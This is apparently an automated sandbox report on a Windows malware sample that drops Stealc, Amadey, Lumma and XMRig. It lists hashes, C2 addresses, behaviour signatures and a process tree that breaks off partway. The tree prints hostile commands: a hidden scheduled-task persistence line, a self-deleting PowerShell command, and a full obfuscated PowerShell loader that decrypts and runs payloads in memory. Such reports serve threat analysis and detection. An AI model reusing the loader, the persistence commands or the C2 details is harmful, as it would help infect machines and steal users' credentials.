Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2024 07:52

General

  • Target

    93debe35016ad648b5ffb8229e8bf61239a00a3ca9f3e0bda608aa3e1268d9bc.exe

  • Size

    1.7MB

  • MD5

    ab907f4a7622702c8c7530eb4320de45

  • SHA1

    1e47f52017a1b5c6e5c37a15ff54c3d379d10a66

  • SHA256

    93debe35016ad648b5ffb8229e8bf61239a00a3ca9f3e0bda608aa3e1268d9bc

  • SHA512

    b84fed708539b43895487f50767b5d16900e7cb59ddc1a7286c9a41b9a5d492519080a018d3dd220bdae4dfadf28a90cc418d737a71ec566f54d431138d57c32

  • SSDEEP

    49152:YUHhOiHg2ibzHNF8d/0Ti8pRHfNxjz99A6Q:XOiH9ibr8d/ZyRHX9ZQ

Malware Config

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
  • XMRig Miner payload 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 32 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1232
      • C:\Users\Admin\AppData\Local\Temp\93debe35016ad648b5ffb8229e8bf61239a00a3ca9f3e0bda608aa3e1268d9bc.exe
        "C:\Users\Admin\AppData\Local\Temp\93debe35016ad648b5ffb8229e8bf61239a00a3ca9f3e0bda608aa3e1268d9bc.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
          3⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6cf9758,0x7fef6cf9768,0x7fef6cf9778
            4⤵
              PID:2716
            • C:\Windows\system32\ctfmon.exe
              ctfmon.exe
              4⤵
                PID:2948
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1068 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:2
                4⤵
                  PID:2588
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:8
                  4⤵
                    PID:2856
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:8
                    4⤵
                      PID:2988
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2108 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:1
                      4⤵
                      • Uses browser remote debugging
                      PID:2056
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2284 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:1
                      4⤵
                      • Uses browser remote debugging
                      PID:2980
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2292 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:1
                      4⤵
                      • Uses browser remote debugging
                      PID:1036
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1304 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:2
                      4⤵
                        PID:2416
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1300 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:2
                        4⤵
                          PID:2568
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=1272,i,708411833655616852,2579823354569315218,131072 /prefetch:8
                          4⤵
                            PID:2960
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          3⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:2580
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef66d9758,0x7fef66d9768,0x7fef66d9778
                            4⤵
                              PID:2184
                            • C:\Windows\system32\ctfmon.exe
                              ctfmon.exe
                              4⤵
                                PID:956
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:2
                                4⤵
                                  PID:1480
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:8
                                  4⤵
                                    PID:1772
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1544 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:8
                                    4⤵
                                      PID:2388
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:1
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:2772
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2368 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:1
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:2644
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2384 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:1
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:2764
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1424 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:2
                                      4⤵
                                        PID:3004
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3820 --field-trial-handle=1184,i,17780056857099298706,11697885434491334741,131072 /prefetch:8
                                        4⤵
                                          PID:2684
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\DGCAAAFCBF.exe"
                                        3⤵
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:2180
                                        • C:\Users\Admin\Documents\DGCAAAFCBF.exe
                                          "C:\Users\Admin\Documents\DGCAAAFCBF.exe"
                                          4⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Loads dropped DLL
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2204
                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                            5⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Loads dropped DLL
                                            • Adds Run key to start application
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Modifies system certificate store
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1836
                                            • C:\Users\Admin\AppData\Local\Temp\1011233001\tpZOod0.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1011233001\tpZOod0.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:956
                                            • C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2296
                                              • C:\Windows\system32\attrib.exe
                                                attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                7⤵
                                                • Views/modifies file attributes
                                                PID:1168
                                              • C:\Windows\system32\attrib.exe
                                                attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                7⤵
                                                • Views/modifies file attributes
                                                PID:1960
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
                                                7⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:848
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell ping 127.0.0.1; del DU1zDwm.exe
                                                7⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2848
                                                • C:\Windows\system32\PING.EXE
                                                  "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                  8⤵
                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                  • Runs ping.exe
                                                  PID:2924
                                            • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:1984
                                              • C:\Users\Admin\AppData\Local\Temp\is-G03F5.tmp\stories.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-G03F5.tmp\stories.tmp" /SL5="$801CA,3307684,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                PID:1540
                                                • C:\Windows\SysWOW64\net.exe
                                                  "C:\Windows\system32\net.exe" pause video_jet_1232
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2684
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 pause video_jet_1232
                                                    9⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1804
                                                • C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe
                                                  "C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe" -i
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1784
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2692
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2224
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2364
                                            • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
                                              6⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2648
                                            • C:\Users\Admin\AppData\Local\Temp\1011459001\cbe53c6aa2.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1011459001\cbe53c6aa2.exe"
                                              6⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Loads dropped DLL
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of FindShellTrayWindow
                                              PID:1532
                                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                7⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Loads dropped DLL
                                                • Adds Run key to start application
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2940
                                                • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Checks processor information in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2772
                                                • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of SetThreadContext
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2988
                                                  • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2880
                                                • C:\Users\Admin\AppData\Local\Temp\1002824001\65e11556fb.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1002824001\65e11556fb.exe"
                                                  8⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies system certificate store
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3012
                                                • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:1300
                                                  • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2572
                                                • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2204
                                                • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
                                                  8⤵
